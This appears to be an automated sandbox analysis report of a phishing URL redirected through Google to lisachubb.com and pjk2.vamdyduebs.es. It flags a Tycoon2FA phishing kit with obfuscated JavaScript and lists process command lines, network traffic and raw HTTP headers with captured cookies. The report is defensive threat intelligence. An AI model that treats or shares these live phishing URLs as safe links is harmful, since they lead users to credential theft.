Edit tour

Windows Analysis Report
https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr

Overview

General Information

Sample URL:https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7d
Analysis ID:1650540
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2104,i,15964423701433874769,16393612139017731578,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_69JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    2.20.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      2.19.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        2.19.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
          2.26..script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
            2.20.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
              Click to see the 5 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://pjk2.vamdyduebs.es/kT9ifrJ/Avira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_69, type: DROPPED
              Source: Yara matchFile source: 2.20.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.11.pages.csv, type: HTML
              Source: Yara matchFile source: 2.15.pages.csv, type: HTML
              Source: Yara matchFile source: 2.20.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.26..script.csv, type: HTML
              Source: Yara matchFile source: 2.11.pages.csv, type: HTML
              Source: Yara matchFile source: 2.15.pages.csv, type: HTML
              Source: Yara matchFile source: 2.19.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.25.d.script.csv, type: HTML
              Source: 2.21..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://pjk2.vamdyduebs.es/kT9ifrJ/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be attempting to execute a malicious payload by decoding and executing a heavily obfuscated string. This is a clear indication of a high-risk, potentially malicious script that should be blocked or further investigated.
              Source: 2.26..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://pjk2.vamdyduebs.es/kT9ifrJ/... This script demonstrates high-risk behavior, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGrHTTP Parser: No favicon
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGrHTTP Parser: No favicon
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGrHTTP Parser: No favicon
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGrHTTP Parser: No favicon
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGrHTTP Parser: No favicon
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGrHTTP Parser: No favicon
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGrHTTP Parser: No favicon
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGrHTTP Parser: No favicon
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGrHTTP Parser: No favicon
              Source: https://pjk2.vamdyduebs.es/kT9ifrJ/HTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.245.240.188:443 -> 192.168.2.16:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.245.240.188:443 -> 192.168.2.16:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.185.250:443 -> 192.168.2.16:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.185.250:443 -> 192.168.2.16:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.16:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.4.189:443 -> 192.168.2.16:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49757 version: TLS 1.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jsuhsks/ HTTP/1.1Host: lisachubb.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.google.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://lisachubb.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU&co=aHR0cHM6Ly9saXNhY2h1YmIuY29tOjQ0Mw..&hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&size=normal&cb=1vy2jk5iocqm HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://lisachubb.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb HTTP/1.1Host: www.google.comConnection: keep-aliveAccept: */*X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerSec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU&co=aHR0cHM6Ly9saXNhY2h1YmIuY29tOjQ0Mw..&hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&size=normal&cb=1vy2jk5iocqmUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: lisachubb.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://lisachubb.com/jsuhsks/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://lisachubb.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA5MCKN6FTOwAV4O7fEJmG2kPHijDCZTqaRlwvooLkhwF1SDrBnZkPr0fv7wZ9wqVjJgeF4YrrxgulfO87Or5B7OHf3HhJ8vL-sF4Oxi24848VprKVfug-7_N1GxMm7D-ZsyPVmuMRPSebbbPYc_plJmCgvg22D6Boc4Qe4Yla0_WzjD-qRF2VOtP7PS6i31ttQpyKR8&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyqOXSS-X2q-K5LKhEX4Wh-W8iyEVfnIlHzzM2Opf45LKbJ_lznlvzpRCHczt9dEhgtc0sTdDW0eQVuENec; NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyqOXSS-X2q-K5LKhEX4Wh-W8iyEVfnIlHzzM2Opf45LKbJ_lznlvzpRCHczt9dEhgtc0sTdDW0eQVuENec; NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA5MCKN6FTOwAV4O7fEJmG2kPHijDCZTqaRlwvooLkhwF1SDrBnZkPr0fv7wZ9wqVjJgeF4YrrxgulfO87Or5B7OHf3HhJ8vL-sF4Oxi24848VprKVfug-7_N1GxMm7D-ZsyPVmuMRPSebbbPYc_plJmCgvg22D6Boc4Qe4Yla0_WzjD-qRF2VOtP7PS6i31ttQpyKR8&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyqOXSS-X2q-K5LKhEX4Wh-W8iyEVfnIlHzzM2Opf45LKbJ_lznlvzpRCHczt9dEhgtc0sTdDW0eQVuENec; NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/userverify?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyqOXSS-X2q-K5LKhEX4Wh-W8iyEVfnIlHzzM2Opf45LKbJ_lznlvzpRCHczt9dEhgtc0sTdDW0eQVuENec; NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/clr?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyqOXSS-X2q-K5LKhEX4Wh-W8iyEVfnIlHzzM2Opf45LKbJ_lznlvzpRCHczt9dEhgtc0sTdDW0eQVuENec; NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
